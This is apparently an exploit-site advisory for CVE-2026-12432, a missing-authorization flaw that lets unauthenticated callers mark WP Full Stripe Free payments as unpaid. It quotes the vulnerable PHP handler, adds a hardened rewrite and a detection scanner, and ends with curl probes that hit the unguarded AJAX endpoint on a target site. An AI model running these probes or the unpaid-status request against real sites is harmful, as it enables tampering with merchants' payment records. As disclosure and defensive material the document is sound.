## https://sploitus.com/exploit?id=CED4BCD6-8E56-5FF9-A68C-174EFA9EBB61
# CVE-2026-12432: WP Full Stripe Free < 8.4.4
- **Published**: June 26, 2026
- **Last Updated**: June 27, 2026
- **Researcher**: Netwurm - VTDR e.V.i.G.

## Vulnerability Description

The WP Full Stripe Free plugin for WordPress is vulnerable to **Missing Authorization** in versions up to, and including, **8.4.3** via the `wpfs_update_failed_payment_status` AJAX action.

### Root Cause

The vulnerable AJAX endpoint is registered through both `wp_ajax_` and `wp_ajax_nopriv_` hooks:

```php
// wpfs-customer.php, Line 705-706
add_action( 'wp_ajax_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
add_action( 'wp_ajax_nopriv_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
```

The `update_failed_payment_status()` function (Line 3835-3865) performs no authorization of any kind before writing to the payments table:
- ❌ **NO capability check** (no `current_user_can()`)
- ❌ **NO nonce verification** (no `wp_verify_nonce()` / `check_ajax_referer()`)
- ❌ **NO logged-in check** (no `is_user_logged_in()`)

### Vulnerable Code

```php
// wpfs-customer.php, Line 3835-3865 (excerpt; elided parts are marked with "...")
function update_failed_payment_status() {
    try {
        $result = [];
        // All three inputs are attacker-controlled. sanitize_text_field() strips tags
        // and control characters, but it does not authorize the request.
        $failureCode = isset( $_POST['failureCode'] ) ? sanitize_text_field( $_POST['failureCode'] ) : null;
        $failureMessage = isset( $_POST['failureMessage'] ) ? sanitize_text_field( $_POST['failureMessage'] ) : null;
        $paymentIntentId = isset( $_POST['paymentIntentId'] ) ? sanitize_text_field( $_POST['paymentIntentId'] ) : null;

        $paymentIntent = $this->stripe->retrievePaymentIntent( $paymentIntentId );
        // ... no auth check before processing; the elided code sets $lastCharge ...

        // Any caller who knows a PaymentIntent id can force the record to unpaid.
        $updateData = [
            'paid' => 0,
            'captured' => 0,
            'refunded' => 0
        ];

        // Attacker can overwrite with controlled values
        if ( $lastCharge ) {
            $updateData['last_charge_status'] = $lastCharge->status;
            $updateData['failure_code'] = $lastCharge->failure_code;
            $updateData['failure_message'] = $lastCharge->failure_message;
        } else {
            $updateData['last_charge_status'] = 'failed';
            $updateData['failure_code'] = $failureCode;
            $updateData['failure_message'] = $failureMessage;
        }

        $this->db->updatePaymentByEventId( $paymentIntentId, $updateData );
        // ...
    } catch ( Exception $e ) {
        // ... error handling elided ...
    }
}
```
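As an added illustration of how the same handler can be hardened while still serving guest checkouts, the following rewrite is not the vendor's 8.4.4 patch (the advisory does not show the actual fix) and makes assumptions the advisory does not state: the checkout page script is handed a nonce created with `wp_create_nonce( 'wpfs_checkout' )` through `wp_localize_script()` and posts it as `nonce`; `$this->stripe` and `$this->db` are the same helpers the vulnerable excerpt calls; and the object returned for a PaymentIntent exposes Stripe's standard `status` and `last_payment_error` fields.

```php
<?php
// Hardened version of update_failed_payment_status(): an added example, not the plugin's
// own code. Assumed (not from the advisory): the checkout JS receives
// wp_create_nonce( 'wpfs_checkout' ) via wp_localize_script() and posts it as 'nonce';
// $this->stripe and $this->db are the helpers used in the vulnerable excerpt.

class WPFS_Customer_Hardened {
    private $stripe; // Stripe API wrapper, as in the excerpt
    private $db;     // payments table wrapper, as in the excerpt

    public function __construct( $stripe, $db ) {
        $this->stripe = $stripe;
        $this->db     = $db;
    }

    public function register_hooks() {
        // Guests do check out, so the nopriv hook has to stay. The nonce checked below,
        // rather than a login, is what ties a request to a checkout page this site rendered.
        add_action( 'wp_ajax_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
        add_action( 'wp_ajax_nopriv_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
    }

    public function update_failed_payment_status() {
        // 1. Nonce check. On failure WordPress calls wp_die() with HTTP 403 and never returns.
        check_ajax_referer( 'wpfs_checkout', 'nonce' );

        // 2. Strict id validation: Stripe PaymentIntent ids have the form pi_<alphanumeric>.
        $paymentIntentId = isset( $_POST['paymentIntentId'] )
            ? sanitize_text_field( wp_unslash( $_POST['paymentIntentId'] ) )
            : '';
        if ( ! preg_match( '/^pi_[A-Za-z0-9]+$/', $paymentIntentId ) ) {
            wp_send_json_error( [ 'message' => 'Invalid payment intent id.' ], 400 ); // exits
        }

        // 3. Stripe is the source of truth; the request body is never trusted for state.
        try {
            $paymentIntent = $this->stripe->retrievePaymentIntent( $paymentIntentId );
        } catch ( Exception $e ) {
            wp_send_json_error( [ 'message' => 'Payment intent lookup failed.' ], 502 ); // exits
        }

        // 4. Only record a failure that Stripe actually reports. After a declined attempt a
        //    PaymentIntent returns to requires_payment_method (or is canceled); a succeeded
        //    intent must never be downgraded to paid = 0, which is exactly what an
        //    unauthenticated caller could do with the original handler.
        $failedStates = [ 'requires_payment_method', 'canceled' ];
        if ( ! isset( $paymentIntent->status ) || ! in_array( $paymentIntent->status, $failedStates, true ) ) {
            wp_send_json_error( [ 'message' => 'Payment intent is not in a failed state.' ], 409 ); // exits
        }

        // 5. Failure details come from Stripe's last_payment_error, so the client-supplied
        //    failureCode / failureMessage parameters are simply never read.
        $error      = isset( $paymentIntent->last_payment_error ) ? $paymentIntent->last_payment_error : null;
        $updateData = [
            'paid'               => 0,
            'captured'           => 0,
            'refunded'           => 0,
            'last_charge_status' => 'failed',
            'failure_code'       => ( $error && isset( $error->code ) )    ? sanitize_text_field( $error->code )    : null,
            'failure_message'    => ( $error && isset( $error->message ) ) ? sanitize_text_field( $error->message ) : null,
        ];

        $this->db->updatePaymentByEventId( $paymentIntentId, $updateData );
        wp_send_json_success( [ 'status' => 'failed' ] );
    }
}
```

The nonce stops cross-site and scripted calls from pages the site did not serve, but it does not prove that the caller owns the payment being updated. A stronger binding, if the plugin keeps a record of which PaymentIntent belongs to which checkout session or order, is to compare the posted id against that record before touching the row; the state check in step 4 is what prevents a succeeded payment from being flipped to unpaid either way.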

## Attack Vector

### Prerequisites
- Payment Intent ID must be known (exposed in browser during normal Stripe checkout)
- No authentication required

### Attack Steps

1. **Identify Target**: Find a WordPress site running WP Full Stripe Free < 8.4.4

## Remediation

Update the plugin to 8.4.4 or later:

```bash
# Via WordPress Admin
#   Dashboard > Plugins > WP Full Stripe > Update

# Via WP-CLI
wp plugin update wp-full-stripe-free

# Via SSH (WP-CLI, pinning the fixed release)
wp plugin update wp-full-stripe-free --version=8.4.4
```

## Detection

### Manual Check

1. Check plugin version in WordPress admin
2. Review `wp-content/plugins/wp-full-stripe-free/includes/wpfs-customer.php`
3. Look for missing `current_user_can()` before AJAX handlers
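Steps 2 and 3 can be automated for a first pass. The scanner below is an added example, not a tool from the advisory or the plugin: it finds every `wp_ajax_nopriv_*` registration in a PHP source file, locates the handler's body by brace matching, and reports handlers that call none of the usual WordPress authorization helpers. It is regex-based, so a hit is a lead for manual review rather than proof; the embedded sample input is a constructed, stripped-down copy of the registration and handler shape shown above plus one guarded handler that should not be reported.

```php
<?php
// Heuristic scanner for the pattern behind CVE-2026-12432: a wp_ajax_nopriv_ handler whose
// body contains no nonce or capability check. Added example, not the advisory's or plugin's
// own code. Regex plus brace matching, so treat results as leads, not proof.

const WPFS_CHECK_FUNCS = [ 'check_ajax_referer', 'wp_verify_nonce', 'current_user_can', 'is_user_logged_in' ];

// Return the body of function/method $name in $source, or null if it is not found.
// Braces inside string literals are skipped; braces inside comments are not (heuristic).
function wpfs_extract_function_body( string $source, string $name ): ?string {
    $decl = '/function\s+' . preg_quote( $name, '/' ) . '\s*\([^)]*\)\s*(?::\s*\??\w+\s*)?\{/';
    if ( ! preg_match( $decl, $source, $m, PREG_OFFSET_CAPTURE ) ) {
        return null;
    }
    $start = $m[0][1] + strlen( $m[0][0] ); // just past the opening brace
    $depth = 1;
    $len   = strlen( $source );
    for ( $i = $start; $i < $len; $i++ ) {
        $c = $source[ $i ];
        if ( $c === "'" || $c === '"' ) {          // skip a quoted string, honouring backslash escapes
            for ( $i++; $i < $len && $source[ $i ] !== $c; $i++ ) {
                if ( $source[ $i ] === '\\' ) { $i++; }
            }
            continue;
        }
        if ( $c === '{' ) {
            $depth++;
        } elseif ( $c === '}' && --$depth === 0 ) {
            return substr( $source, $start, $i - $start );
        }
    }
    return null; // unbalanced braces
}

// Find every wp_ajax_nopriv_* registration and report handlers that call none of
// WPFS_CHECK_FUNCS. Returns a list of ['action' => ..., 'handler' => ..., 'missing' => [...]].
function wpfs_find_unguarded_nopriv_handlers( string $source ): array {
    $findings = [];
    // Callback forms handled: [ $this, 'name' ], array( $this, 'name' ) and a plain 'name'.
    $reg = '/add_action\(\s*[\'"]wp_ajax_nopriv_([\w-]+)[\'"]\s*,\s*'
         . '(?:\[\s*\$this\s*,\s*[\'"](\w+)[\'"]\s*\]|array\(\s*\$this\s*,\s*[\'"](\w+)[\'"]\s*\)|[\'"](\w+)[\'"])/';
    if ( ! preg_match_all( $reg, $source, $matches, PREG_SET_ORDER ) ) {
        return $findings;
    }
    foreach ( $matches as $m ) {
        $handler = '';
        foreach ( [ 2, 3, 4 ] as $g ) {             // whichever callback form matched
            if ( ! empty( $m[ $g ] ) ) { $handler = $m[ $g ]; break; }
        }
        $body = wpfs_extract_function_body( $source, $handler );
        if ( $body === null ) {
            $findings[] = [ 'action' => $m[1], 'handler' => $handler, 'missing' => [ 'body-not-found' ] ];
            continue;
        }
        $present = array_filter( WPFS_CHECK_FUNCS, fn( $f ) => preg_match( '/\b' . $f . '\s*\(/', $body ) === 1 );
        if ( empty( $present ) ) {
            $findings[] = [ 'action' => $m[1], 'handler' => $handler, 'missing' => WPFS_CHECK_FUNCS ];
        }
    }
    return $findings;
}

// Constructed sample input: the shape of the vulnerable registration/handler, plus a
// guarded handler that must not be reported.
$sample = <<<'SAMPLE'
add_action( 'wp_ajax_nopriv_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
add_action( 'wp_ajax_nopriv_wpfs_guarded_example', [ $this, 'guarded_example' ] );
function update_failed_payment_status() {
    try {
        $paymentIntentId = isset( $_POST['paymentIntentId'] ) ? sanitize_text_field( $_POST['paymentIntentId'] ) : null;
        $this->db->updatePaymentByEventId( $paymentIntentId, [ 'paid' => 0 ] );
    } catch ( Exception $e ) {
    }
}
function guarded_example() {
    check_ajax_referer( 'wpfs_checkout', 'nonce' );
    wp_send_json_success();
}
SAMPLE;

// Scan a real file when a path is given (e.g. includes/wpfs-customer.php), else the sample.
$source = isset( $argv[1] ) ? file_get_contents( $argv[1] ) : $sample;
foreach ( wpfs_find_unguarded_nopriv_handlers( $source ) as $f ) {
    printf( "UNGUARDED nopriv action '%s' -> %s(): none of %s\n", $f['action'], $f['handler'], implode( ', ', $f['missing'] ) );
}
```

Run as `php scan.php wp-content/plugins/wp-full-stripe-free/includes/wpfs-customer.php`; with no argument it scans the embedded sample and reports only `wpfs_update_failed_payment_status`. Handlers that delegate their checks to a helper method will show up as false positives, and handlers whose checks sit in a comment or string will be false negatives, which is why step 3 remains a manual review.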

### Automated Detection

```bash
# Check if vulnerable version is installed
curl -s https://TARGET/wp-content/plugins/wp-full-stripe-free/readme.txt | grep -i "Stable tag"

# Test AJAX endpoint
curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
  -d "action=wpfs_update_failed_payment_status" \
  -d "paymentIntentId=test" | grep -q "success" && echo "Potentially Vulnerable"
```

## References

- [Wordfence Intelligence](https://www.wordfence.com/threat-intel/vulnerabilities/cve-2026-12432)
- [Plugin Trac](https://plugins.trac.wordpress.org/browser/wp-full-stripe-free/tags/8.4.3/includes/wpfs-customer.php)
- [Patchstack Database](https://patchstack.com/database/)

## W.P.E.F
- [W.P.E.F Telegram channel #1](https://t.me/wpef0)
- [W.P.E.F Telegram channel #2](https://t.me/wpef01)

## Timeline

- **June 26, 2026**: Vulnerability publicly disclosed
- **June 27, 2026**: CVE-2026-12432 published
- **Patch**: Update to >= 8.4.4